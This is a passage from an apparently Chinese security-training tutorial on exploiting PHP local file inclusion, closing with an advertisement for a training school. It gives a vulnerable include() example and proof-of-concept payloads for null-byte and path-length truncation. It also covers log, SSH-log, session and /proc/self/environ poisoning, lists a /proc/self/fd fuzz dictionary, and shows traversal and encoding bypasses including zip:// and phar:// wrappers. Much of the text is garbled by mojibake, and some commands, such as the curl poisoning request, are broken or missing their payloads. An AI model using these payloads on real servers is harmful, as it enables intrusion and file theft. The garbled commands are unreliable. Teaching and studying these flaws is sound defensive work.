5.1. %00截?cái)?/p>

　　5.1.1. 要求

　　php版本小于5.3.4

　　magic_quotes_gpc為off狀態(tài)

　　magic_quotes_gpc為on狀態(tài)時(shí)%00前會(huì)被自動(dòng)加上一個(gè)反斜杠轉(zhuǎn)義

　　5.1.2. 實(shí)例

　　index.php

　　if(empty($_GET["file"])){

　　echo('../flag.php');

　　return;

　　}

　　else{

　　$filename='pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome.txt").'.html';//限制了只能訪問(wèn).html后綴名的文件,如果想訪問(wèn).php后綴名的文件就需要截?cái)嗪竺娴?html

　　include $filename;

　　}

　　?>

　　poc

　　index.php?file=../../flag.php%00

　　5.2. 路徑長(zhǎng)度截?cái)?/p>

　　5.2.1. 要求

　　php版本小于5.2.8

　　5.2.2. 操作系統(tǒng)文件長(zhǎng)度限制

　　windows 259個(gè)bytes

　　linux 4096個(gè)bytes

　　5.2.3. 實(shí)例

　　index.php

　　if(empty($_GET["file"])){

　　echo('../flag.php');

　　return;

　　}

　　else{

　　$filename='pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome.txt").'.html';//限制了只能訪問(wèn).html后綴名的文件,如果想訪問(wèn).php后綴名的文件就需要階段后面的.html

　　include $filename;

　　}

　　?>

　　5.2.4. poc

　　windows:

　　poc1:file=../../flag.php..............................................................................................................................................................................................................................................

　　poc2:file=../../flag.php./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

　　5.3.總結(jié)

　　一般來(lái)說(shuō)如果php版本在5.3.4以下,先嘗試使用%00截?cái)?如果不行再使用路徑長(zhǎng)度截?cái)?/p>

　　6.包含Apache日志文件

　　WEB服務(wù)器一般會(huì)將用戶的訪問(wèn)記錄保存在訪問(wèn)日志中。那么我們可以根據(jù)日志記錄的內(nèi)容，精心構(gòu)造請(qǐng)求，把PHP代碼插入到日志文件中，通過(guò)文件包含漏洞來(lái)執(zhí)行日志中的PHP代碼。

　　6.1. 使用條件

　　對(duì)日志文件可讀

　　知道日志文件存儲(chǔ)目錄

　　curl命令行url請(qǐng)求工具(避免url轉(zhuǎn)碼的存在)

　　6.2. 獲取日志存放路徑

　　日志默認(rèn)路徑

　　(1) apache+Linux日志默認(rèn)路徑

　　/etc/httpd/logs/access_log

　　/var/log/httpd/access_log

　　(2) apache+win2003日志默認(rèn)路徑

　　D:\xampp\apache\logs\access.log

　　D:\xampp\apache\logs\error.log

　　(3) IIS6.0+win2003默認(rèn)日志文件

　　C:\WINDOWS\system32\Logfiles

　　(4) IIS7.0+win2003 默認(rèn)日志文件

　　%SystemDrive%\inetpub\logs\LogFiles

　　(5) nginx 日志文件

　　日志文件在用戶安裝目錄logs目錄下

　　以我的安裝路徑為例/usr/local/nginx,

　　那我的日志目錄就是在/usr/local/nginx/logs里

　　6.3. 利用方式

　　使用瀏覽器訪問(wèn)特殊字符會(huì)被編碼,可以使用curl避免特殊字符被編碼,但是需要注意的是[ ]在curl是特殊符號(hào)，需要進(jìn)行轉(zhuǎn)義 ，不然curl使用時(shí)會(huì)報(bào)錯(cuò)

　　curl -v "http://xxxxx/file.php?page="?page="

　　7.包含SSH log 日志

　　7.1. 利用條件

　　需要知道ssh-log的位置，且可讀。默認(rèn)情況下為 /var/log/auth.log

　　7.2. 利用方式

　　首先使用ssh連接

　　ssh ''@remotehost

　　然后隨意輸入密碼

　　最后結(jié)合文件包含漏洞即可利用

　　8.包含SESSION

　　8.1. 利用條件

　　找到Session內(nèi)的可控變量

　　Session文件可讀寫(xiě)，并且知道存儲(chǔ)路徑

　　php的session文件的保存路徑可以在phpinfo的session.save_path看到

　　8.2. session常見(jiàn)存儲(chǔ)路徑

　　/var/lib/php/sess_PHPSESSID

　　/var/lib/php/sess_PHPSESSID

　　/tmp/sess_PHPSESSID

　　/tmp/sessions/sess_PHPSESSID

　　session文件格式：sess_[phpsessid] ，而 phpsessid 在發(fā)送的請(qǐng)求的 cookie 字段中可以看到

　　9.包含environ

　　利用條件：

　　php以cgi方式運(yùn)行，這樣environ才會(huì)保持UA頭。

　　environ文件存儲(chǔ)位置已知，且environ文件可讀。

　　姿勢(shì)：

　　/proc/self/environ中會(huì)保存user-agent頭。如果在user-agent中插入php代碼，則php代碼會(huì)被寫(xiě)入到中。之后再包含它即可。

　　10.包含/proc/self/fd/[environreferer]

　　apache的錯(cuò)誤日志可能包含在/proc/self/fd/[envrionreferer],例如/proc/self/fd/2,/proc/self/fd/3,/proc/self/fd/10,可以使用burpsuite的測(cè)試器模塊fuzz出該文件結(jié)構(gòu)

　　fuzz字典:

　　/proc/self/cmdline

　　/proc/self/stat

　　/proc/self/status

　　/proc/self/fd/0

　　/proc/self/fd/1

　　/proc/self/fd/2

　　/proc/self/fd/3

　　/proc/self/fd/4

　　/proc/self/fd/5

　　/proc/self/fd/6

　　/proc/self/fd/7

　　/proc/self/fd/8

　　/proc/self/fd/9

　　/proc/self/fd/10

　　/proc/self/fd/11

　　/proc/self/fd/12

　　/proc/self/fd/13

　　/proc/self/fd/14

　　/proc/self/fd/15

　　/proc/self/fd/16

　　/proc/self/fd/17

　　/proc/self/fd/18

　　/proc/self/fd/19

　　/proc/self/fd/20

　　/proc/self/fd/21

　　/proc/self/fd/22

　　/proc/self/fd/23

　　/proc/self/fd/24

　　/proc/self/fd/25

　　/proc/self/fd/26

　　/proc/self/fd/27

　　/proc/self/fd/28

　　/proc/self/fd/29

　　/proc/self/fd/30

　　/proc/self/fd/31

　　/proc/self/fd/32

　　/proc/self/fd/33

　　/proc/self/fd/34

　　/proc/self/fd/35

　　11.包含臨時(shí)文件

　　php中上傳文件，會(huì)創(chuàng)建臨時(shí)文件。在linux下使用/tmp目錄，而在windows下使用c:\winsdows\temp目錄。在臨時(shí)文件被刪除之前，利用競(jìng)爭(zhēng)即可包含該臨時(shí)文件。

　　由于包含需要知道包含的文件名。一種方法是進(jìn)行暴力猜解，linux下使用的隨機(jī)函數(shù)有缺陷，而window下只有65535中不同的文件名，所以這個(gè)方法是可行的。

　　另一種方法是配合phpinfo頁(yè)面的php variables，可以直接獲取到上傳文件的存儲(chǔ)路徑和臨時(shí)文件名，直接包含即可。這個(gè)方法可以參考LFI With PHPInfo Assistance

　　12.其他包含姿勢(shì)

　　包含stmp日志

　　包含xss

　　包含上傳文件

　　13.文件包含漏洞的繞過(guò)方法

　　13.1. 特定前綴繞過(guò)

　　13.1.1. 目錄遍歷

　　使用 …/…/ 來(lái)返回上一目錄，被稱為目錄遍歷(Path Traversal)。例如 ?file=…/…/phpinfo/phpinfo.php

　　13.1.2. 編碼繞過(guò)

　　服務(wù)器端常常會(huì)對(duì)于…/等做一些過(guò)濾，可以用一些編碼來(lái)進(jìn)行繞過(guò)。

　　服務(wù)器端常常會(huì)對(duì)于…/等做一些過(guò)濾，可以用一些編碼來(lái)進(jìn)行繞過(guò)。

　　1.利用url編碼

　　/%2e%2e%2f

　　...

　　%2f%2e%2e/

　　\%2e%2e%5c

　　...

　　%5c%2e%2e\

　　2.二次編碼

　　/%252e%252e%252f

　　/%252e%252e%255c

　　13.2. 指定后綴繞過(guò)

　　13.2.1. query(?)

　　[訪問(wèn)參數(shù)] ?file=http://localhost:8081/phpinfo.php?

　　[拼接后] ?file=http://localhost:8081/phpinfo.php?.txt

　　?將后面的.txt截?cái)?web服務(wù)器會(huì)認(rèn)為.txt是一個(gè)新的參數(shù)

　　13.2.2. fragment(#)

　　[訪問(wèn)參數(shù)] ?file=http://localhost:8081/phpinfo.php%23

　　[拼接后] ?file=http://localhost:8081/phpinfo.php#.txt

　　13.2.3. zip://

　　[訪問(wèn)參數(shù)] ?file=zip://D:\zip.jpg%23phpinfo

　　[拼接后] ?file=zip://D:\zip.jpg#phpinfo.txt

　　13.2.4. phar://

　　[訪問(wèn)參數(shù)] ?file=phar://zip.zip/phpinfo

　　[拼接后] ?file=phar://zip.zip/phpinfo.txt

　　更多關(guān)于“網(wǎng)絡(luò)安全培訓(xùn)”的問(wèn)題，歡迎咨詢千鋒教育在線名師。千鋒教育多年辦學(xué)，課程大綱緊跟企業(yè)需求，更科學(xué)更嚴(yán)謹(jǐn)，每年培養(yǎng)泛IT人才近2萬(wàn)人。不論你是零基礎(chǔ)還是想提升，都可以找到適合的班型，千鋒教育隨時(shí)歡迎你來(lái)試聽(tīng)。